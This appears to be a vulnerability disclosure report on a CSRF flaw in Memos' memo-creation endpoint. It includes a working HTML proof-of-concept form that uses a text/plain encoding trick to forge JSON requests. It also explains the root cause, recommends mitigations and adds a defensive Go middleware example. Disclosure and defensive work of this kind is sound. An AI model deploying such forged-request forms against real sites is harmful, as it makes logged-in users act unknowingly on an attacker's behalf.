I have discovered a CSRF vulnerability in Memos, in the Create a Memo functionality (POST /api/memo).
I have identified that it is possible to manipulate the actions of authenticated users by tricking them into clicking on a malicious link or visiting a malicious website while they are logged into Memos. This can allow an attacker to perform actions on behalf of the victim, such as creating or modifying memos.
To reproduce the vulnerability, I followed these steps:
<html>
<body>
<!-- hide the PoC path from the address bar -->
<script>history.pushState('', '', '/')</script>
<!-- enctype="text/plain" makes the browser send the form field as name=value with
     Content-Type: text/plain, so the JSON document is carried in the field name;
     the inner quotes must be HTML-escaped or the attribute breaks -->
<form action="http://localhost:5230/api/memo" method="POST" enctype="text/plain">
<input type="hidden" name="{&quot;content&quot;:&quot;CSRF&quot;,&quot;visibility&quot;:&quot;PRIVATE&quot;,&quot;resourceIdList&quot;:[]}" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
I have attached a proof-of-concept HTML file and a video demonstrating the vulnerability to this report.
The Cross-Site Request Forgery (CSRF) vulnerability exists because the application does not validate that the Content-Type of the request is application/json and accepts a body submitted as text/plain. A plain HTML form can only send application/x-www-form-urlencoded, multipart/form-data or text/plain; all three are "simple" request types that a browser sends cross-origin without a CORS preflight and with the victim's session cookie attached, so accepting a JSON body under text/plain is what lets the form above forge the request.
https://drive.google.com/file/d/10eIE2pXRcVDT1juyGu5_MSmvzgTmj_35/view?usp=sharing
I recommend that you take the following steps to mitigate this vulnerability:
Implement proper CSRF protection, such as including a unique token in all forms and verifying it on the server side.
The application should validate the Content-Type of state-changing requests and reject anything other than application/json. A cross-origin request with Content-Type: application/json is not a simple request, so the browser will require a CORS preflight before sending it, which prevents an attacker from using a plain HTML form to perform unauthorized actions.
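The following is an added example that illustrates both the root cause described above and the two recommended mitigations together; it is not code from Memos or from this report. It is a stand-alone net/http middleware (cookie and header names, the `Simulate` helper and the placeholder memo handler are all hypothetical) that rejects state-changing requests unless the Content-Type is application/json and a CSRF token sent in a request header matches the token in a session-bound cookie (double-submit pattern). The constructed requests in `main` replay the text/plain form submission from the PoC, a JSON request without a token, and a legitimate request.

```go
package main

import (
	"crypto/rand"
	"crypto/subtle"
	"encoding/hex"
	"fmt"
	"mime"
	"net/http"
	"net/http/httptest"
	"strings"
)

// Hypothetical names; Memos itself does not define these.
const (
	csrfCookieName = "csrf_token"
	csrfHeaderName = "X-CSRF-Token"
)

// isStateChanging reports whether a method may modify server state and
// therefore needs CSRF protection.
func isStateChanging(method string) bool {
	switch method {
	case http.MethodPost, http.MethodPut, http.MethodPatch, http.MethodDelete:
		return true
	}
	return false
}

// hasJSONContentType accepts only application/json (with or without a charset
// parameter). HTML forms cannot produce this media type, so the check alone
// stops the text/plain form in the PoC.
func hasJSONContentType(contentType string) bool {
	mediaType, _, err := mime.ParseMediaType(contentType)
	if err != nil {
		return false // header missing or malformed
	}
	return mediaType == "application/json"
}

// csrfTokensMatch compares the header token with the cookie token in constant time.
func csrfTokensMatch(headerToken, cookieToken string) bool {
	if headerToken == "" || cookieToken == "" {
		return false
	}
	return subtle.ConstantTimeCompare([]byte(headerToken), []byte(cookieToken)) == 1
}

// newCSRFToken returns a random token the server sets in the csrf cookie at login.
func newCSRFToken() (string, error) {
	b := make([]byte, 32)
	if _, err := rand.Read(b); err != nil {
		return "", err
	}
	return hex.EncodeToString(b), nil
}

// CSRFGuard wraps a handler and enforces both checks on state-changing requests.
func CSRFGuard(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if isStateChanging(r.Method) {
			if !hasJSONContentType(r.Header.Get("Content-Type")) {
				http.Error(w, "Content-Type must be application/json", http.StatusUnsupportedMediaType)
				return
			}
			cookie, err := r.Cookie(csrfCookieName)
			if err != nil || !csrfTokensMatch(r.Header.Get(csrfHeaderName), cookie.Value) {
				http.Error(w, "missing or invalid CSRF token", http.StatusForbidden)
				return
			}
		}
		next.ServeHTTP(w, r)
	})
}

// memoHandler is a placeholder for the real POST /api/memo handler.
func memoHandler() http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if r.Method == http.MethodPost {
			w.WriteHeader(http.StatusCreated)
			return
		}
		w.WriteHeader(http.StatusOK)
	})
}

// Simulate runs one constructed request through the guarded handler and
// returns the resulting HTTP status code.
func Simulate(method, contentType, cookieToken, headerToken string) int {
	body := `{"content":"CSRF","visibility":"PRIVATE","resourceIdList":[]}` // constructed sample body
	req := httptest.NewRequest(method, "/api/memo", strings.NewReader(body))
	if contentType != "" {
		req.Header.Set("Content-Type", contentType)
	}
	if cookieToken != "" { // the browser attaches cookies even to forged requests
		req.AddCookie(&http.Cookie{Name: csrfCookieName, Value: cookieToken})
	}
	if headerToken != "" { // only same-origin JavaScript can add this header
		req.Header.Set(csrfHeaderName, headerToken)
	}
	rec := httptest.NewRecorder()
	CSRFGuard(memoHandler()).ServeHTTP(rec, req)
	return rec.Code
}

func main() {
	token, _ := newCSRFToken()
	fmt.Println("forged text/plain form:", Simulate("POST", "text/plain", token, ""))      // 415
	fmt.Println("JSON without header token:", Simulate("POST", "application/json", token, "")) // 403
	fmt.Println("legitimate request:", Simulate("POST", "application/json", token, token))  // 201
	fmt.Println("read-only GET:", Simulate("GET", "", "", ""))                              // 200
}
```

The Content-Type check is what directly closes the vector in this report; the header-versus-cookie token comparison is the general protection, since a cross-site page can neither read the cookie nor set a custom header without a preflight. Marking the session cookie SameSite=Lax or Strict adds a further layer, but the server-side checks should not depend on it.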